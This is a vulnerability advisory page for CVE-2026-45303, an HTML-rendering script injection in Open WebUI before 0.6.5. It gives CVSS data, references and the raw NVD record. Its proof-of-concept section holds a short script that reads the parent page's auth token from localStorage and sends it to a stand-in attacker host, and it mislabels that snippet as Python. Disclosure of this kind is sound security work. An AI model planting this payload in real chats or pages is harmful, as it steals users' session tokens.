CVE-2026-45303

Description

Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.6.5, through the HTML rendering view, scripts can be injected and executed. The frontend provides a function to visualize the HTML content of a current chat. The content is embedded in an iFrame with the allow-scripts allow-forms allow-same-origin sandbox directive. This means that the content is placed in a sandbox but with permission to execute scripts and access the parent’s data (e.g., local storage). As a result, only a few functions are restricted (e.g., displaying an alert box), but in effect, the sandbox attribute is largely nullified. This vulnerability is fixed in 0.6.5.

CVSS Details

CVSS Score

7.7

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Open WebUI < 0.6.5

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- Proof of Concept: Exploiting Sandbox Escape -->
<script>
  // Access parent window's localStorage due to allow-same-origin
  const sensitiveData = parent.localStorage.getItem('auth_token');
  
  // Exfiltrate data to an attacker controlled server
  if (sensitiveData) {
    fetch('https://attacker.com/exfil', {
      method: 'POST',
      body: JSON.stringify({ token: sensitiveData })
    });
  }
</script>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-45303
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-45303
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-45303/
[4] VulDB https://vuldb.com/cve/CVE-2026-45303
[5] https://github.com/open-webui/open-webui/security/advisories/GHSA-4vrc-m9ch-6m3r

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-45303", "sourceIdentifier": "[email protected]", "published": "2026-05-15T22:16:53.977", "lastModified": "2026-05-15T22:16:53.977", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.6.5, through the HTML rendering view, scripts can be injected and executed. The frontend provides a function to visualize the HTML content of a current chat. The content is embedded in an iFrame with the allow-scripts allow-forms allow-same-origin sandbox directive. This means that the content is placed in a sandbox but with permission to execute scripts and access the parent’s data (e.g., local storage). As a result, only a few functions are restricted (e.g., displaying an alert box), but in effect, the sandbox attribute is largely nullified. This vulnerability is fixed in 0.6.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:N", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.3, "impactScore": 5.8}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-4vrc-m9ch-6m3r", "source": "[email protected]"}]}}